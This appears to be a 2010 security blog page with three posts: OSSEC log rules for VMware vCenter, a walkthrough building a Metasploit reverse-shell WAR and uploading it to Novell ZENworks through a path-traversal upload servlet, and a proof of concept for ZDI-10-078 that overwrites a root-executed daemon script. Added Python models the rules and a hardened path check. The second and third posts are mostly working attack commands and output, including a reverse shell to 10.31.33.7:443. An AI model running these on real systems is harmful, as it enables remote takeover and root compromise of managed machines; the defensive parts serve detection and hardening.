30 April 2010

OSSEC rules for vpxd

A quick-and-dirty decoder/rules example so that OSSEC understands the vpxd.log of VMware Virtual Center (tested on vCenter 4).

Decoder

<!-- VMWare Virtual Center vpxd logs.
- [2010-04-29 13:42:52.048 03572 warning 'Libs'] SSLVerifyCertAgainstSystemStore: The remote host certificate has these problems:
- [2010-04-29 11:46:47.101 02144 info 'App'] [Auth]: User DOMAIN\luser
- [2010-04-29 13:54:54.406 02656 info 'App'] Unable to log on locally as DOMAIN\Administrator, so switched to NETWORK-style logon
-->

<decoder name="vpxd">
<prematch>^[\d\d\d\d-\d\d-\d\d \d\d:\d\d:\d\d.\d\d\d \d+ </prematch>
</decoder>

<decoder name="vpxd-extra">
<parent>vpxd</parent>
<regex offset="after_parent">^(\w+) '\w+'] (\.+)</regex>
<order>status, extra_data</order>
</decoder>

Rules

<!-- VMWare Virtual Center vpxd -->
<group name="vpxd,">
<rule id="19200" level="0">
<decoded_as>vpxd</decoded_as>
<description>VMWare Virtual Center vpxd messages grouped.</description>
</rule>
<rule id="19201" level="4">
<if_sid>19200</if_sid>
<status>^warning</status>
<description>VMWare Virtual Center vpxd warning message.</description>
</rule>

<rule id="19202" level="8">
<if_sid>19200</if_sid>
<status>^error</status>
<description>VMWare Virtual Center vpxd error message.</description>
</rule>

<rule id="19203" level="0">
<if_sid>19200</if_sid>
<status>^info</status>
<description>VMWare Virtual Center vpxd info message.</description>
</rule>

<!-- Authentication messages. -->
<rule id="19204" level="3">
<if_sid>19203</if_sid>
<match>[Auth]: User</match>
<description>VMWare Virtual Center vpxd authentication success.</description>
<group>authentication_success,</group>
</rule>

<rule id="19205" level="5">
<if_sid>19203</if_sid>
<match>Unable to log on locally as</match>
<description>VMWare Virtual Center vpxd NETWORK-style logon.</description>
<group>authentication_failed,</group>
</rule>

<!-- SSL errors. -->

<rule id="19206" level="5">
<if_sid>19201</if_sid>
<match>SSLVerifyCertAgainstSystemStore</match>
<description>VMWare Virtual Center vpxd SSL error.</description>
<group>system_error,</group>
</rule>
</group> <!-- VMWare Virtual Center vpxd -->
<!-- EOF -->
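To sanity-check the decoder and rule tree above before loading them into OSSEC, here is an added Python model (not part of the original post and not OSSEC code) that applies equivalent regexes and the same rule logic to the three sample lines from the decoder comment. It assumes the OSSEC pattern semantics noted in its comments (\d digit, \w as [A-Za-z0-9@_-], \. any character, literal square brackets).

```python
import re

# Python equivalents of decoders "vpxd" and "vpxd-extra" above. In OSSEC syntax \d is a
# digit, \w is [A-Za-z0-9@_-], \. means "any character" and [ ] are literal, so the
# prematch "^[\d\d\d\d-\d\d-\d\d ..." becomes the first pattern below.
PREMATCH = re.compile(r"^\[\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{3} \d+ ")
EXTRA = re.compile(r"^([A-Za-z0-9@_-]+) '[A-Za-z0-9@_-]+'\] (.+)")

# Constructed sample events: the three lines quoted in the decoder comment.
SAMPLE = [
    "[2010-04-29 13:42:52.048 03572 warning 'Libs'] SSLVerifyCertAgainstSystemStore: "
    "The remote host certificate has these problems:",
    "[2010-04-29 11:46:47.101 02144 info 'App'] [Auth]: User DOMAIN\\luser",
    "[2010-04-29 13:54:54.406 02656 info 'App'] Unable to log on locally as "
    "DOMAIN\\Administrator, so switched to NETWORK-style logon",
]

def decode(line):
    """Mimic decoders vpxd + vpxd-extra: None if prematch fails, else (status, extra_data)."""
    m = PREMATCH.match(line)
    if m is None:
        return None
    m2 = EXTRA.match(line[m.end():])              # offset="after_parent"
    return (m2.group(1), m2.group(2)) if m2 else ("", "")

def classify(line):
    """Walk rules 19200-19206 and return (rule_id, level), or None if not decoded as vpxd."""
    decoded = decode(line)
    if decoded is None:
        return None
    status, _extra = decoded
    rule = (19200, 0)                             # grouping rule, level 0
    if status.startswith("warning"):              # 19201, with 19206 as its child
        rule = (19206, 5) if "SSLVerifyCertAgainstSystemStore" in line else (19201, 4)
    elif status.startswith("error"):              # 19202
        rule = (19202, 8)
    elif status.startswith("info"):               # 19203, then its two <match> children
        if "[Auth]: User" in line:
            rule = (19204, 3)
        elif "Unable to log on locally as" in line:
            rule = (19205, 5)
        else:
            rule = (19203, 0)
    return rule

if __name__ == "__main__":
    for event in SAMPLE:
        print(classify(event), event[:60])
```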
--
Greetings from #linux, your community channel.

28 April 2010

Reverse shell with WAR files

We create the WAR with Metasploit.

luser$ ./msfpayload linux/x86/shell_reverse_tcp LHOST=10.31.33.7 LPORT=443 w > shell_reverse_tcp.war
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/shell_reverse_tcp
Length: 71
Options: LHOST=10.31.33.7,LPORT=443


We list the contents of the WAR to find the name of the file we will have to send the HTTP request to.

luser$ unzip -l shell_reverse_tcp.war
Archive: shell_reverse_tcp.war
Length Date Time Name
-------- ---- ---- ----
71 04-28-10 22:40 META-INF/MANIFEST.MF
0 04-28-10 22:40 WEB-INF/
285 04-28-10 22:40 WEB-INF/web.xml
1582 04-28-10 22:40 mcyowonbnhrqsyy.jsp
310 04-28-10 22:40 wNaoQNtbYmK.txt
-------- -------
2248 5 files


In another terminal, as root so that it can bind to TCP/443...

root# ./msfcli exploit/multi/handler PAYLOAD=linux/x86/shell_reverse_tcp LHOST=10.31.33.7 LPORT=443 E
[*] Please wait while we load the module tree...
[*] Started reverse handler on 10.31.33.7:443
[*] Starting the payload handler...


We upload the WAR.

luser$ curl -ivkl 'http://zcm.server/zenworks-fileupload/?type=application/octet-stream/../../../../../../../opt/novell/zenworks/share/tomcat/webapps&filename=zenw.war&overwrite=true' --data-binary @./shell_reverse_tcp.war -H "Content-Type: application/octet-stream"


We make the HTTP request to start the reverse shell.

luser$ curl -ivkl 'http://zcm.server/zenw/mcyowonbnhrqsyy.jsp'


And magically the connection shows up in the terminal running msfcli.

[*] Command shell session 1 opened (10.31.33.7:443 -> 10.1.2.3:41221)

whoami
zenworks
pwd
/
netstat -putan | grep 443
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN -
tcp 0 0 10.1.2.3:41221 10.31.33.7:443 ESTABLISHED 4519/sh
pstree
init─┬─acpid
├─console-kit-dae───63*[{console-kit-dae}]
├─cron
├─dbus-daemon
├─java───17*[{java}]
├─java───39*[{java}]
├─jsvc───jsvc─┬─sh
│ └─78*[{jsvc}]
├─klogd

--
Greetings from #linux, your script kiddies channel.

27 April 2010

PoC for ZDI-10-078

# Exploit Title: ZDI-10-078: Novell ZENworks Configuration Management UploadServlet Remote Code Execution Vulnerability
# Date: 2009-04-26
# Author: tucanalamigo http://tucanalamigo.blogspot.com
# Software Link: http://www.novell.com/products/zenworks/configurationmanagement/
# Version: 10.2
# Tested on: GNU/Linux (SLES11)


* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
PoC for vulnerability discovered by Stephen Fewer (www.harmonysecurity.com)
http://www.zerodayinitiative.com/advisories/ZDI-10-078/
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

You can overwrite any file owned by the zenworks user (nearly all of /opt/novell), such as /opt/novell/zenworks/bin/daemon-monitor, a shell script executed by the Novell ZENworks Daemon Monitor (/etc/init.d/novell-zenmntr) and, "of course", running as root...


$ ls -l /opt/novell/zenworks/bin/daemon-monitor
-rw-rw-r-- 1 zenworks zenworks 554 XXXX-YY-ZZ 69:69 /opt/novell/zenworks/bin/daemon-monitor
$ cat /opt/novell/zenworks/bin/daemon-monitor
SERVICES=`awk -F= '{ if ($1 == "services") print $2}' /etc/opt/novell/zenworks/monitor.conf`
SLEEPTIME=`awk -F= '{ if ($1 == "sleep") print $2}' /etc/opt/novell/zenworks/monitor.conf`

echo $SERVICES
echo $SLEEPTIME

if [ -z "$SERVICES" ]; then
echo "No services defined in /etc/opt/novell/zenworks/monitor.conf"
exit 1
fi

if [ -z "$SLEEPTIME" ]; then
SLEEPTIME=10
fi

while [ 1 ]; do
sleep $SLEEPTIME
for SRV in $SERVICES; do
/etc/init.d/$SRV status >/dev/null 2>&1 || /etc/init.d/$SRV start
( date ; id ) >> /tmp/monitor.log 2>&1
done
done
$


You can replace /opt/novell/zenworks/bin/jsvc (the Java Virtual Machine launcher), upload a new remoteshell.war to /opt/novell/zenworks/share/tomcat/webapps, or use your
imagination to take control of all the machines managed by ZCM.

PoC: Upload your own daemon-monitor (./daemon-monitor.troyanizado):


$ curl -ivkl 'http://zcm.server/zenworks-fileupload/?type=application/octet-stream/../../../../../../../opt/novell/zenworks/bin/&filename=daemon-monitor&overwrite=true' --data-binary @./daemon-monitor.troyanizado -H "Content-Type: application/octet-stream"
* About to connect() to zcm.server port 80 (#0)
* Trying 127.11.22.33... connected
* Connected to zcm.server (127.11.22.33) port 80 (#0)
> POST /zenworks-fileupload/?type=application/octet-stream/../../../../../../../opt/novell/zenworks/bin/&filename=daemon-monitor&overwrite=true HTTP/1.1
> User-Agent: curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.12.6.2 zlib/1.2.3 libidn/1.9 libssh2/1.2.2
> Host: zcm.server
> Accept: */*
> Content-Type: application/octet-stream
> Content-Length: 554
< HTTP/1.1 200 OK
HTTP/1.1 200 OK
< Server: Apache-Coyote/1.1
Server: Apache-Coyote/1.1
< Content-Length: 0
Content-Length: 0
< Date: Mon, 26 Apr 2010 21:58:05 GMT
Date: Mon, 26 Apr 2010 21:58:05 GMT


* Connection #0 to host zcm.server left intact
* Closing connection #0
$
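As an added example from the defender's side (not part of the original posts and not Novell's code), the block below models the path construction that both the WAR upload of 28 April and this PoC abuse: the `type` and `filename` parameters are joined under a hypothetical upload root, once without and once with a containment check, plus a small detector for the pattern in request logs. The upload root is an assumption; the two queries are copied from the curl commands on this page.

```python
import posixpath
from urllib.parse import parse_qs

# Hypothetical upload root; the advisory does not state where the servlet stores files.
UPLOAD_ROOT = "/opt/novell/zenworks/upload"

# The two request queries used on this page (constructed from the curl commands above).
WAR_QUERY = ("type=application/octet-stream/../../../../../../../opt/novell/zenworks/share/"
             "tomcat/webapps&filename=zenw.war&overwrite=true")
MONITOR_QUERY = ("type=application/octet-stream/../../../../../../../opt/novell/zenworks/bin/"
                 "&filename=daemon-monitor&overwrite=true")

def resolve_naive(query):
    """The bug class: root + type + filename joined with no containment check."""
    q = parse_qs(query)
    return posixpath.normpath(posixpath.join(UPLOAD_ROOT, q["type"][0], q["filename"][0]))

def resolve_safe(query):
    """Hardened version: filename must be a single path component and the canonical
    target must still lie under UPLOAD_ROOT; anything else raises ValueError."""
    q = parse_qs(query)
    filename = q.get("filename", [""])[0]
    if filename in ("", ".", "..") or "/" in filename or "\\" in filename:
        raise ValueError("invalid filename")
    target = posixpath.normpath(posixpath.join(UPLOAD_ROOT, q.get("type", [""])[0], filename))
    if not target.startswith(UPLOAD_ROOT.rstrip("/") + "/"):
        raise ValueError("target escapes upload root: " + target)
    return target

def traversal_in_query(query):
    """Detection helper for Tomcat access logs: a '..' segment in the decoded type value."""
    return any(".." in t.split("/") for t in parse_qs(query).get("type", []))

if __name__ == "__main__":
    for q in (WAR_QUERY, MONITOR_QUERY):
        print("naive ->", resolve_naive(q), "| traversal:", traversal_in_query(q))
```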

--
Greetings from #linux, your friendly channel.